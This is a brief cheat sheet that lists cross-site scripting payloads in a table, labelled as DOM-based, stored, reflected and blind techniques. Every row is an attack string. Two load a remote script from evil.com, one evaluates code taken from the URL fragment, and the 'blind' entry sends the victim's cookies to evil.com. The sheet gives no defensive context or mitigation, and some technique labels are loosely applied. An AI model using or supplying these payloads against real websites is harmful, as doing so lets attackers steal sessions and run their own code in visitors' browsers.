Advanced XSS Techniques:
| Technique | Payload |
|---|---|
| DOM-Based XSS | <script>var x=document.createElement('script');x.src='//evil.com/xss.js';document.body.appendChild(x);</script> |
| Stored XSS | <img src=x onerror=eval('var x=document.createElement(\'script\');x.src=\'//evil.com/xss.js\';document.body.appendChild(x)')> |
| Reflected XSS | <script>eval(location.hash.slice(1))</script> (in URL: http://example.com/#alert(1)) |
| Blind XSS | <script>new Image().src='//evil.com/log?=' + document.cookie;</script> |